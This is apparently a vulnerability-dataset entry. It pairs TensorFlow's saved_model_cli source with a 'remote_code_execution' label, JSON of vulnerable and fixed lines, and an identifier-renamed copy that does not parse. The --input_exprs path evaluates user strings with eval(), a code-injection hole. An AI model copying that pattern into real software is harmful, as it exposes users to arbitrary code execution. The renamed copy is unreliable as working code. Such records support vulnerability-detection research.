    loader.load(sess, tag_set.split(','), saved_model_dir)

    if tf_debug:
      # Wrap the session so TFDBG intercepts every run() call.
      sess = local_cli_wrapper.LocalCLIDebugWrapperSession(sess)

    outputs = sess.run(output_tensor_names_sorted, feed_dict=inputs_feed_dict)

    # outputs aligns with output_tensor_keys_sorted by construction above.
    for i, output in enumerate(outputs):
      output_tensor_key = output_tensor_keys_sorted[i]
      print('Result for output key %s:\n%s' % (output_tensor_key, output))

      # Only save if outdir is specified.
      if outdir:
        # Create directory if outdir does not exist
        if not os.path.isdir(outdir):
          os.makedirs(outdir)
        output_full_path = os.path.join(outdir, output_tensor_key + '.npy')

        # If overwrite not enabled and file already exist, error out
        if not overwrite_flag and os.path.exists(output_full_path):
          raise RuntimeError(
              'Output file %s already exists. Add \"--overwrite\" to overwrite'
              ' the existing output files.' % output_full_path)

        np.save(output_full_path, output)
        print('Output %s is saved to %s' % (output_tensor_key,
                                            output_full_path))
def preprocess_inputs_arg_string(inputs_str):
  """Parses input arg into dictionary that maps input to file/variable tuple.

  Parses input string in the format of, for example,
  "input1=filename1[variable_name1],input2=filename2" into a
  dictionary looks like
  {'input_key1': (filename1, variable_name1),
   'input_key2': (file2, None)}
  , which maps input keys to a tuple of file name and variable name(None if
  empty).

  Args:
    inputs_str: A string that specified where to load inputs. Inputs are
      separated by semicolons.
        * For each input key:
            '<input_key>=<filename>' or
            '<input_key>=<filename>[<variable_name>]'
        * The optional 'variable_name' key will be set to None if not
          specified.

  Returns:
    A dictionary that maps input keys to a tuple of file name and variable
    name.

  Raises:
    RuntimeError: An error when the given input string is in a bad format.
  """
  input_dict = {}
  inputs_raw = inputs_str.split(';')
  for input_raw in filter(bool, inputs_raw):  # skip empty strings
    # Format of input=filename[variable_name]'
    match = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
    if match:
      input_dict[match.group(1)] = match.group(2), match.group(3)
    else:
      # Format of input=filename'
      match = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
      if match:
        input_dict[match.group(1)] = match.group(2), None
      else:
        # Fix: the original implicitly-concatenated message had no separators
        # between its pieces ('...Please follow"<input_key>=<filename>", or"...'),
        # producing a garbled error; add the missing spaces.
        raise RuntimeError(
            '--inputs "%s" format is incorrect. Please follow '
            '"<input_key>=<filename>", or '
            '"<input_key>=<filename>[<variable_name>]"' % input_raw)
  return input_dict
def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):
  """Parses input arg into dictionary that maps input key to python expression.

  Parses input string in the format of 'input_key=<python expression>' into a
  dictionary that maps each input_key to its python expression.

  Args:
    input_exprs_str: A string that specifies python expression for input keys.
      Each input is separated by semicolon. For each input key:
        'input_key=<python expression>'
    safe: Whether to evaluate the python expression as literals or allow
      arbitrary calls (e.g. numpy usage).

  Returns:
    A dictionary that maps input keys to their values.

  Raises:
    RuntimeError: An error when the given input string is in a bad format or,
      with safe=True, when an expression is not a valid python literal.
  """
  input_dict = {}
  for input_raw in filter(bool, input_exprs_str.split(';')):
    # Fix: the original tested `'=' not in input_exprs_str` (the whole
    # argument) instead of this individual entry, so a malformed entry such
    # as 'a=1;b' slipped past the check and crashed with an unpacking
    # ValueError below instead of raising the intended RuntimeError.
    if '=' not in input_raw:
      raise RuntimeError('--input_exprs "%s" format is incorrect. Please '
                         'follow "<input_key>=<python expression>"' %
                         input_raw)
    input_key, expr = input_raw.split('=', 1)
    if safe:
      try:
        input_dict[input_key] = ast.literal_eval(expr)
      except Exception as exc:
        # Narrowed from a bare `except:` (which also swallowed
        # KeyboardInterrupt) and chained so the parse error stays visible.
        raise RuntimeError(
            f'Expression "{expr}" is not a valid python literal.') from exc
    else:
      # ast.literal_eval does not work with numpy expressions
      input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
  return input_dict
def preprocess_input_examples_arg_string(input_examples_str):
  """Parses input into dict that maps input keys to lists of tf.Example.

  Parses input string in the format of 'input_key1=[{feature_name:
  feature_list}];input_key2=[{feature_name:feature_list}];' into a dictionary
  that maps each input_key to its list of serialized tf.Example.

  Args:
    input_examples_str: A string that specifies a list of dictionaries of
      feature_names and their feature_lists for each input.
      Each input is separated by semicolon. For each input key:
        'input=[{feature_name1: feature_list1, feature_name2:feature_list2}]'
      items in feature_list can be the type of float, int, long or str.

  Returns:
    A dictionary that maps input keys to lists of serialized tf.Example.

  Raises:
    ValueError: An error when the given tf.Example is not a list.
  """
  # Literal-parse first (safe mode), then serialize each dict to tf.Example.
  parsed = preprocess_input_exprs_arg_string(input_examples_str)
  for key in parsed:
    examples = parsed[key]
    if not isinstance(examples, list):
      raise ValueError(
          'tf.Example input must be a list of dictionaries, but "%s" is %s' %
          (examples, type(examples)))
    parsed[key] = [_create_example_string(ex) for ex in examples]
  return parsed
def _create_example_string(example_dict):
  """Create a serialized tf.example from feature dictionary."""
  example = example_pb2.Example()
  for name, values in example_dict.items():
    if not isinstance(values, list):
      raise ValueError('feature value must be a list, but %s: "%s" is %s' %
                       (name, values, type(values)))
    # The first element determines which typed value list to populate.
    first = values[0]
    feature = example.features.feature[name]
    if isinstance(first, float):
      feature.float_list.value.extend(values)
    elif isinstance(first, str):
      feature.bytes_list.value.extend([v.encode('utf8') for v in values])
    elif isinstance(first, bytes):
      feature.bytes_list.value.extend(values)
    elif isinstance(first, six.integer_types):
      feature.int64_list.value.extend(values)
    else:
      raise ValueError(
          'Type %s for value %s is not supported for tf.train.Feature.' %
          (type(first), first))
  return example.SerializeToString()
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
                                      input_examples_str):
  """Parses input arg strings and create inputs feed_dict.

  Parses '--inputs' string for inputs to be loaded from file, and parses
  '--input_exprs' string for inputs to be evaluated from python expression.
  '--input_examples' string for inputs to be created from tf.example feature
  dictionary list.

  Precedence when the same key appears in several sources:
  --input_examples overrides --input_exprs overrides --inputs (see the
  override loops at the bottom).

  Args:
    inputs_str: A string that specified where to load inputs. Each input is
      separated by semicolon.
        * For each input key:
            '<input_key>=<filename>' or
            '<input_key>=<filename>[<variable_name>]'
        * The optional 'variable_name' key will be set to None if not
          specified.
        * File specified by 'filename' will be loaded using numpy.load.
          Inputs can be loaded from only .npy, .npz or pickle files.
        * The "[variable_name]" key is optional depending on the input file
          type as descripted in more details below.
      When loading from a npy file, which always contains a numpy ndarray,
      the content will be directly assigned to the specified input tensor. If
      a variable_name is specified, it will be ignored and a warning will be
      issued.
      When loading from a npz zip file, user can specify which variable
      within the zip file to load for the input tensor inside the square
      brackets. If nothing is specified, this function will check that only
      one file is included in the zip and load it for the specified input
      tensor.
      When loading from a pickle file, if no variable_name is specified in
      the square brackets, whatever that is inside the pickle file will be
      passed to the specified input tensor, else SavedModel CLI will assume a
      dictionary is stored in the pickle file and the value corresponding to
      the variable_name will be used.
    input_exprs_str: A string that specifies python expressions for inputs.
        * In the format of: '<input_key>=<python expression>'.
        * numpy module is available as np.
    input_examples_str: A string that specifies tf.Example with dictionary.
        * In the format of: '<input_key>=<[{feature:value list}]>'

  Returns:
    A dictionary that maps input tensor keys to numpy ndarrays.

  Raises:
    RuntimeError: An error when a key is specified, but the input file
      contains multiple numpy ndarrays, none of which matches the given key.
    RuntimeError: An error when no key is specified, but the input file
      contains more than one numpy ndarrays.
  """
  tensor_key_feed_dict = {}

  inputs = preprocess_inputs_arg_string(inputs_str)
  # NOTE(review): safe=False means --input_exprs goes through eval(); the
  # CLI help text warns users that this is susceptible to code injection.
  input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)
  input_examples = preprocess_input_examples_arg_string(input_examples_str)

  for input_tensor_key, (filename, variable_name) in inputs.items():
    # allow_pickle=True is required for pickle files and object arrays.
    data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True)  # pylint: disable=unexpected-keyword-arg

    # When a variable_name key is specified for the input file
    if variable_name:
      # if file contains a single ndarray, ignore the input name
      if isinstance(data, np.ndarray):
        logging.warn(
            'Input file %s contains a single ndarray. Name key \"%s\" ignored.'
            % (filename, variable_name))
        tensor_key_feed_dict[input_tensor_key] = data
      else:
        if variable_name in data:
          tensor_key_feed_dict[input_tensor_key] = data[variable_name]
        else:
          raise RuntimeError(
              'Input file %s does not contain variable with name \"%s\".' %
              (filename, variable_name))
    # When no key is specified for the input file.
    else:
      # Check if npz file only contains a single numpy ndarray.
      if isinstance(data, np.lib.npyio.NpzFile):
        variable_name_list = data.files
        if len(variable_name_list) != 1:
          raise RuntimeError(
              'Input file %s contains more than one ndarrays. Please specify '
              'the name of ndarray to use.' % filename)
        tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]
      else:
        tensor_key_feed_dict[input_tensor_key] = data

  # When input is a python expression:
  for input_tensor_key, py_expr_evaluated in input_exprs.items():
    if input_tensor_key in tensor_key_feed_dict:
      logging.warn(
          'input_key %s has been specified with both --inputs and --input_exprs'
          ' options. Value in --input_exprs will be used.' % input_tensor_key)
    tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated

  # When input is a tf.Example:
  for input_tensor_key, example in input_examples.items():
    if input_tensor_key in tensor_key_feed_dict:
      logging.warn(
          'input_key %s has been specified in multiple options. Value in '
          '--input_examples will be used.' % input_tensor_key)
    tensor_key_feed_dict[input_tensor_key] = example
  return tensor_key_feed_dict
def show(args):
  """Function triggered by show command.

  Dispatches to the appropriate _show_* helper based on which flags were set.

  Args:
    args: A namespace parsed from command line.
  """
  if args.all:
    # --all: dump tag-sets, SignatureDefs, tensor info and functions.
    _show_all(args.dir)
  elif args.tag_set is None:
    # No tag-set given: just list the available tag-sets.
    _show_tag_sets(args.dir)
  elif args.signature_def is None:
    # Tag-set given but no signature key: list the SignatureDef keys.
    _show_signature_def_map_keys(args.dir, args.tag_set)
  else:
    # Fully specified: show input/output tensors of one SignatureDef.
    _show_inputs_outputs(args.dir, args.tag_set, args.signature_def)
def run(args):
  """Function triggered by run command.

  Args:
    args: A namespace parsed from command line.

  Raises:
    AttributeError: An error when neither --inputs nor --input_exprs is passed
      to run command.
  """
  if not (args.inputs or args.input_exprs or args.input_examples):
    raise AttributeError(
        'At least one of --inputs, --input_exprs or --input_examples must be '
        'required')
  feed_dict = load_inputs_from_input_arg_string(
      args.inputs, args.input_exprs, args.input_examples)
  run_saved_model_with_feed_dict(
      args.dir, args.tag_set, args.signature_def, feed_dict, args.outdir,
      args.overwrite, worker=args.worker, init_tpu=args.init_tpu,
      tf_debug=args.tf_debug)
def scan(args):
  """Function triggered by scan command.

  Scans either the MetaGraph selected by --tag_set or, when no tag-set is
  given, every MetaGraph in the SavedModel.

  Args:
    args: A namespace parsed from command line.
  """
  if not args.tag_set:
    for meta_graph_def in saved_model_utils.read_saved_model(
        args.dir).meta_graphs:
      scan_meta_graph_def(meta_graph_def)
  else:
    scan_meta_graph_def(
        saved_model_utils.get_meta_graph_def(args.dir, args.tag_set))
def convert_with_tensorrt(args):
  """Function triggered by 'convert tensorrt' command.

  Args:
    args: A namespace parsed from command line.
  """
  # Import here instead of at top, because this will crash if TensorRT is
  # not installed
  from tensorflow.python.compiler.tensorrt import trt_convert as trt  # pylint: disable=g-import-not-at-top

  if not args.convert_tf1_model:
    # TF2 path: converter API driven by conversion params.
    params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
        max_workspace_size_bytes=args.max_workspace_size_bytes,
        precision_mode=args.precision_mode,
        minimum_segment_size=args.minimum_segment_size)
    converter = trt.TrtGraphConverterV2(
        input_saved_model_dir=args.dir,
        input_saved_model_tags=args.tag_set.split(','),
        conversion_params=params)
    try:
      converter.convert()
    except Exception as e:
      # Conversion commonly fails when the input is actually a TF1
      # SavedModel; point the user at the fallback flag.
      raise RuntimeError(
          '{}. Try passing "--convert_tf1_model=True".'.format(e))
    converter.save(output_saved_model_dir=args.output_dir)
  else:
    # TF1 path: legacy create_inference_graph API.
    trt.create_inference_graph(
        None,
        None,
        max_batch_size=1,
        max_workspace_size_bytes=args.max_workspace_size_bytes,
        precision_mode=args.precision_mode,
        minimum_segment_size=args.minimum_segment_size,
        is_dynamic_op=True,
        input_saved_model_dir=args.dir,
        input_saved_model_tags=args.tag_set.split(','),
        output_saved_model_dir=args.output_dir)
def aot_compile_cpu(args):
  """Function triggered by aot_compile_cpu command.

  Args:
    args: A namespace parsed from command line.
  """
  # Default to the conventional variables path inside the SavedModel dir.
  checkpoint_path = args.checkpoint_path or os.path.join(
      args.dir, 'variables/variables')

  if not args.variables_to_feed:
    variables_to_feed = []
  elif args.variables_to_feed.lower() == 'all':
    variables_to_feed = None  # We will identify them after.
  else:
    variables_to_feed = args.variables_to_feed.split(',')

  enable_multithreading = args.multithreading.lower() not in (
      'f', 'false', '0')
  saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
      checkpoint_path=checkpoint_path,
      meta_graph_def=saved_model_utils.get_meta_graph_def(
          args.dir, args.tag_set),
      signature_def_key=args.signature_def_key,
      variables_to_feed=variables_to_feed,
      output_prefix=args.output_prefix,
      target_triple=args.target_triple,
      target_cpu=args.target_cpu,
      cpp_class=args.cpp_class,
      multithreading=enable_multithreading)
def add_show_subparser(subparsers):
  """Add parser for `show`."""
  show_msg = (
      'Usage examples:\n'
      'To show all tag-sets in a SavedModel:\n'
      '$saved_model_cli show --dir /tmp/saved_model\n\n'
      'To show all available SignatureDef keys in a '
      'MetaGraphDef specified by its tag-set:\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve\n\n'
      'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
      'passed in, separated by \';\':\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve,gpu\n\n'
      'To show all inputs and outputs TensorInfo for a specific'
      ' SignatureDef specified by the SignatureDef key in a'
      ' MetaGraph.\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve'
      ' --signature_def serving_default\n\n'
      'To show all available information in the SavedModel:\n'
      '$saved_model_cli show --dir /tmp/saved_model --all')
  parser_show = subparsers.add_parser(
      'show',
      description=show_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  # --dir is the only required flag; the rest select how much to display.
  parser_show.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to inspect')
  parser_show.add_argument(
      '--all',
      action='store_true',
      help='if set, will output all information in given SavedModel')
  parser_show.add_argument(
      '--tag_set',
      type=str,
      default=None,
      help='tag-set of graph in SavedModel to show, separated by \',\'')
  parser_show.add_argument(
      '--signature_def',
      type=str,
      default=None,
      metavar='SIGNATURE_DEF_KEY',
      help='key of SignatureDef to display input(s) and output(s) for')
  # Dispatch to show() when this subcommand is selected.
  parser_show.set_defaults(func=show)
def add_run_subparser(subparsers):
  """Add parser for `run`."""
  run_msg = ('Usage example:\n'
             'To run input tensors from files through a MetaGraphDef and save'
             ' the output tensors to files:\n'
             '$saved_model_cli show --dir /tmp/saved_model --tag_set serve \\\n'
             ' --signature_def serving_default \\\n'
             ' --inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
             '\\\n'
             ' --input_exprs \'input3_key=np.ones(2)\' \\\n'
             ' --input_examples '
             '\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
             ' --outdir=/out\n\n'
             'For more information about input file format, please see:\n'
             'https://www.tensorflow.org/guide/saved_model_cli\n')
  parser_run = subparsers.add_parser(
      'run', description=run_msg, formatter_class=argparse.RawTextHelpFormatter)
  parser_run.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to execute')
  parser_run.add_argument(
      '--tag_set',
      type=str,
      required=True,
      help='tag-set of graph in SavedModel to load, separated by \',\'')
  parser_run.add_argument(
      '--signature_def',
      type=str,
      required=True,
      metavar='SIGNATURE_DEF_KEY',
      help='key of SignatureDef to run')
  # Three alternative input sources; at least one is required (enforced in
  # run(), not by argparse).
  msg = ('Loading inputs from files, in the format of \'<input_key>=<filename>,'
         ' or \'<input_key>=<filename>[<variable_name>]\', separated by \';\'.'
         ' The file format can only be from .npy, .npz or pickle.')
  parser_run.add_argument('--inputs', type=str, default='', help=msg)
  msg = ('Specifying inputs by python expressions, in the format of'
         ' "<input_key>=\'<python expression>\'", separated by \';\'. '
         'numpy module is available as \'np\'. Please note that the expression '
         'will be evaluated as-is, and is susceptible to code injection. '
         'When this is set, the value will override duplicate input keys from '
         '--inputs option.')
  parser_run.add_argument('--input_exprs', type=str, default='', help=msg)
  msg = (
      'Specifying tf.Example inputs as list of dictionaries. For example: '
      '<input_key>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
      'separate input keys. Will override duplicate input keys from --inputs '
      'and --input_exprs option.')
  parser_run.add_argument('--input_examples', type=str, default='', help=msg)
  parser_run.add_argument(
      '--outdir',
      type=str,
      default=None,
      help='if specified, output tensor(s) will be saved to given directory')
  parser_run.add_argument(
      '--overwrite',
      action='store_true',
      help='if set, output file will be overwritten if it already exists.')
  parser_run.add_argument(
      '--tf_debug',
      action='store_true',
      help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
      'intermediate Tensors and runtime GraphDefs while running the '
      'SavedModel.')
  parser_run.add_argument(
      '--worker',
      type=str,
      default=None,
      help='if specified, a Session will be run on the worker. '
      'Valid worker specification is a bns or gRPC path.')
  parser_run.add_argument(
      '--init_tpu',
      action='store_true',
      default=None,
      help='if specified, tpu.initialize_system will be called on the Session. '
      'This option should be only used if the worker is a TPU job.')
  # Dispatch to run() when this subcommand is selected.
  parser_run.set_defaults(func=run)
def add_scan_subparser(subparsers):
  """Registers the `scan` subcommand and its flags on `subparsers`."""
  scan_msg = ('Usage example:\n'
              'To scan for denylisted ops in SavedModel:\n'
              '$saved_model_cli scan --dir /tmp/saved_model\n'
              'To scan a specific MetaGraph, pass in --tag_set\n')
  scan_parser = subparsers.add_parser(
      'scan', description=scan_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  scan_parser.add_argument(
      '--dir', type=str, required=True,
      help='directory containing the SavedModel to execute')
  # --tag_set is optional: without it, every MetaGraph is scanned.
  scan_parser.add_argument(
      '--tag_set', type=str,
      help='tag-set of graph in SavedModel to scan, separated by \',\'')
  scan_parser.set_defaults(func=scan)
def add_convert_subparser(subparsers):
    """Register the `convert` command and its conversion-method subcommands."""
    usage_text = ('Usage example:\n'
                  'To convert the SavedModel to one that have TensorRT ops:\n'
                  '$saved_model_cli convert \\\n'
                  ' --dir /tmp/saved_model \\\n'
                  ' --tag_set serve \\\n'
                  ' --output_dir /tmp/saved_model_trt \\\n'
                  ' tensorrt \n')
    convert_parser = subparsers.add_parser(
        'convert',
        description=usage_text,
        formatter_class=argparse.RawTextHelpFormatter)
    convert_parser.add_argument(
        '--dir',
        type=str,
        required=True,
        help='directory containing the SavedModel to convert')
    convert_parser.add_argument(
        '--output_dir',
        type=str,
        required=True,
        help='output directory for the converted SavedModel')
    convert_parser.add_argument(
        '--tag_set',
        type=str,
        required=True,
        help="tag-set of graph in SavedModel to convert, separated by ','")
    # Each conversion backend is a nested subcommand of `convert`.
    method_subparsers = convert_parser.add_subparsers(
        title='conversion methods',
        description='valid conversion methods',
        help='the conversion to run with the SavedModel')
    tensorrt_parser = method_subparsers.add_parser(
        'tensorrt',
        description='Convert the SavedModel with Tensorflow-TensorRT integration',
        formatter_class=argparse.RawTextHelpFormatter)
    tensorrt_parser.add_argument(
        '--max_workspace_size_bytes',
        type=int,
        default=2 << 20,
        help=('the maximum GPU temporary memory which the TRT engine can use at '
              'execution time'))
    tensorrt_parser.add_argument(
        '--precision_mode',
        type=str,
        default='FP32',
        help='one of FP32, FP16 and INT8')
    tensorrt_parser.add_argument(
        '--minimum_segment_size',
        type=int,
        default=3,
        help=('the minimum number of nodes required for a subgraph to be replaced'
              'in a TensorRT node'))
    # NOTE(review): argparse's `type=bool` converts any non-empty string to
    # True; kept as-is for backward compatibility with existing invocations.
    tensorrt_parser.add_argument(
        '--convert_tf1_model',
        type=bool,
        default=False,
        help='support TRT conversion for TF1 models')
    # Dispatch handler for `saved_model_cli convert ... tensorrt`.
    tensorrt_parser.set_defaults(func=convert_with_tensorrt)
def add_aot_compile_cpu_subparser(subparsers):
    """Register the `aot_compile_cpu` command with the CLI's subparsers."""
    usage_text = '\n'.join(
        ['Usage example:',
         'To compile a SavedModel signature via (CPU) XLA AOT:',
         '$saved_model_cli aot_compile_cpu \\',
         ' --dir /tmp/saved_model \\',
         ' --tag_set serve \\',
         ' --output_dir /tmp/saved_model_xla_aot',
         '', '',
         'Note: Additional XLA compilation options are available by setting the ',
         'XLA_FLAGS environment variable. See the XLA debug options flags for ',
         'all the options: ',
         ' {}'.format(_XLA_DEBUG_OPTIONS_URL),
         '',
         'For example, to disable XLA fast math when compiling:',
         '',
         'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
         'aot_compile_cpu ...',
         '',
         'Some possibly useful flags:',
         ' --xla_cpu_enable_fast_math=false',
         ' --xla_force_host_platform_device_count=<num threads>',
         ' (useful in conjunction with disabling multi threading)'
        ])
    aot_parser = subparsers.add_parser(
        'aot_compile_cpu',
        description=usage_text,
        formatter_class=argparse.RawTextHelpFormatter)
    aot_parser.add_argument(
        '--dir',
        type=str,
        required=True,
        help='directory containing the SavedModel to convert')
    aot_parser.add_argument(
        '--output_prefix',
        type=str,
        required=True,
        help=('output directory + filename prefix for the resulting header(s) '
              'and object file(s)'))
    aot_parser.add_argument(
        '--tag_set',
        type=str,
        required=True,
        help="tag-set of graph in SavedModel to convert, separated by ','")
    # Default comes from the SavedModel serving-signature constant.
    aot_parser.add_argument(
        '--signature_def_key',
        type=str,
        default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
        help=('signature_def key to use. '
              'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
    aot_parser.add_argument(
        '--target_triple',
        type=str,
        default='x86_64-pc-linux',
        help=('Target triple for LLVM during AOT compilation. Examples: '
              'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
              'armv7-none-android. More examples are available in tfcompile.bzl '
              'in the tensorflow codebase.'))
    aot_parser.add_argument(
        '--target_cpu',
        type=str,
        default='',
        help=('Target cpu name for LLVM during AOT compilation. Examples: '
              'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
              'a complete list of options, run (for x86 targets): '
              '`llc -march=x86 -mcpu=help`'))
    aot_parser.add_argument(
        '--checkpoint_path',
        type=str,
        default=None,
        help='Custom checkpoint to use (default: use the SavedModel variables)')
    aot_parser.add_argument(
        '--cpp_class',
        type=str,
        required=True,
        help=('The name of the generated C++ class, wrapping the generated '
              'function. The syntax of this flag is '
              '[[<optional_namespace>::],...]<class_name>. This mirrors the '
              'C++ syntax for referring to a class, where multiple namespaces '
              'may precede the class name, separated by double-colons. '
              'The class will be generated in the given namespace(s), or if no '
              'namespaces are given, within the global namespace.'))
    aot_parser.add_argument(
        '--variables_to_feed',
        type=str,
        default='',
        help=('The names of variables that will be fed into the network. '
              'Options are: empty (default; all variables are frozen, none may '
              'be fed), \'all\' (all variables may be fed), or a '
              'comma-delimited list of names of variables that may be fed. In '
              'the last case, the non-fed variables will be frozen in the graph.'
              '**NOTE** Any variables passed to `variables_to_feed` *must be set '
              'by the user*. These variables will NOT be frozen and their '
              'values will be uninitialized in the compiled object '
              '(this applies to all input arguments from the signature as '
              'well).'))
    # NOTE(review): a string flag ('False'/'True') rather than store_true;
    # the handler lowercases it, so the string form is part of the contract.
    aot_parser.add_argument(
        '--multithreading',
        type=str,
        default='False',
        help=('Enable multithreading in the compiled computation. '
              'Note that if using this option, the resulting object files '
              'may have external dependencies on multithreading libraries '
              'like nsync.'))
    # Dispatch handler for `saved_model_cli aot_compile_cpu`.
    aot_parser.set_defaults(func=aot_compile_cpu)
def create_parser():
    """Creates the command-line argument parser for saved_model_cli.

    Registers one subparser per supported command (show, run, scan, convert,
    aot_compile_cpu); each subparser attaches its handler function via
    `set_defaults(func=...)`, which `main` later invokes.

    Returns:
      An `argparse.ArgumentParser` configured with all subcommands; the
      caller is responsible for invoking `parse_args` on it.
      (The previous docstring incorrectly claimed a parsed namespace was
      returned.)
    """
    parser = argparse.ArgumentParser(
        description='saved_model_cli: Command-line interface for SavedModel')
    parser.add_argument('-v', '--version', action='version', version='0.1.0')
    subparsers = parser.add_subparsers(
        title='commands', description='valid commands', help='additional help')
    # show command
    add_show_subparser(subparsers)
    # run command
    add_run_subparser(subparsers)
    # scan command
    add_scan_subparser(subparsers)
    # tensorrt convert command
    add_convert_subparser(subparsers)
    # aot_compile_cpu command
    add_aot_compile_cpu_subparser(subparsers)
    return parser
def main():
    """Parse command-line arguments and dispatch to the selected command."""
    logging.set_verbosity(logging.INFO)
    cli_parser = create_parser()
    parsed = cli_parser.parse_args()
    # Every subcommand installs its handler via set_defaults(func=...);
    # a missing `func` attribute means no subcommand was supplied.
    if not hasattr(parsed, 'func'):
        cli_parser.error('too few arguments')
    parsed.func(parsed)
# Script entry point: run the CLI and use main()'s result as the process
# exit status (main() has no return statement, so success exits with 0).
if __name__ == '__main__':
  sys.exit(main())
| remote_code_execution | {
"code": [
"def preprocess_input_exprs_arg_string(input_exprs_str):",
" input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)",
" 'numpy module is available as \\'np\\'. '",
" 'Will override duplicate input keys from --inputs option.')"
],
"line_no": [
524,
662,
926,
927
]
} | {
"code": [
"import ast",
" Each input is separated by semicolon. For each input key:",
" arbitrary calls (e.g. numpy usage).",
" try:",
" input_dict[input_key] = ast.literal_eval(expr)",
" raise RuntimeError(",
" else:",
" input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)",
" 'numpy module is available as \\'np\\'. Please note that the expression '",
" 'will be evaluated as-is, and is susceptible to code injection. '",
" 'When this is set, the value will override duplicate input keys from '",
" '--inputs option.')"
],
"line_no": [
23,
533,
536,
552,
553,
555,
557,
672,
936,
937,
938,
939
]
} |
import argparse
import os
import re
import .sys
from absl import app # pylint: disable=unused-import
import numpy as np
import .six
from tensorflow.core.example import .example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import .session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import .meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import .save
from tensorflow.python.saved_model import .signature_constants
from tensorflow.python.tools import .saved_model_aot_compile
from tensorflow.python.tools import .saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
VAR_0 = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
VAR_1 = set(['WriteFile', 'ReadFile', 'PrintV2'])
def FUNC_0(VAR_2):
VAR_22 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
print('The given SavedModel contains the following tag-sets:')
for VAR_3 in sorted(VAR_22):
print('%r' % ', '.join(sorted(VAR_3)))
def FUNC_1(VAR_2, VAR_3):
VAR_23 = FUNC_10(VAR_2, VAR_3)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for VAR_5 in sorted(VAR_23.keys()):
print('SignatureDef key: \"%VAR_27\"' % VAR_5)
def FUNC_2(VAR_4,
VAR_5):
if VAR_5 not in VAR_4.signature_def:
raise ValueError(
f'Could not find signature "{VAR_5}". Please choose from: '
f'{", ".join(VAR_4.signature_def.keys())}')
return VAR_4.signature_def[VAR_5].inputs
def FUNC_3(VAR_4,
VAR_5):
return VAR_4.signature_def[VAR_5].outputs
def FUNC_4(VAR_2, VAR_3, VAR_5, VAR_6=0):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_24 = FUNC_2(
VAR_4, VAR_5)
VAR_25 = FUNC_3(
VAR_4, VAR_5)
VAR_26 = ' ' * VAR_6
def FUNC_30(VAR_27):
print(VAR_26 + VAR_27)
FUNC_30('The given SavedModel SignatureDef contains the following input(VAR_27):')
for VAR_68, input_tensor in sorted(VAR_24.items()):
FUNC_30(' VAR_43[\'%VAR_27\'] VAR_9:' % VAR_68)
FUNC_7(input_tensor, VAR_6+1)
FUNC_30('The given SavedModel SignatureDef contains the following '
'output(VAR_27):')
for output_key, output_tensor in sorted(VAR_25.items()):
FUNC_30(' VAR_66[\'%VAR_27\'] VAR_9:' % output_key)
FUNC_7(output_tensor, VAR_6+1)
FUNC_30('Method name is: %s' %
VAR_4.signature_def[VAR_5].method_name)
def FUNC_5(VAR_2):
VAR_28 = saved_model_utils.read_saved_model(VAR_2).meta_graphs
VAR_29 = False
for VAR_4 in VAR_28:
VAR_29 |= VAR_4.HasField('object_graph_def')
if not VAR_29:
return
with ops_lib.Graph().as_default():
VAR_61 = load.load(VAR_2)
print('\nDefined Functions:', VAR_32='')
VAR_30 = (
save._AugmentedGraphView(VAR_61) # pylint: disable=protected-access
.list_functions(VAR_61))
VAR_30 = sorted(VAR_30.items(), key=lambda x: x[0])
for name, function in VAR_30:
print('\n Function Name: \'%VAR_27\'' % name)
VAR_62 = []
if isinstance(function, defun.ConcreteFunction):
VAR_62.append(function)
if isinstance(function, def_function.Function):
VAR_62.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
VAR_62 = sorted(VAR_62, key=lambda x: x.name)
for index, concrete_function in enumerate(VAR_62, 1):
VAR_20, VAR_76 = None, None
if concrete_function.structured_input_signature:
VAR_20, VAR_76 = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
VAR_20 = concrete_function._arg_keywords # pylint: disable=protected-access
if VAR_20:
print(' Option #%d' % index)
print(' Callable with:')
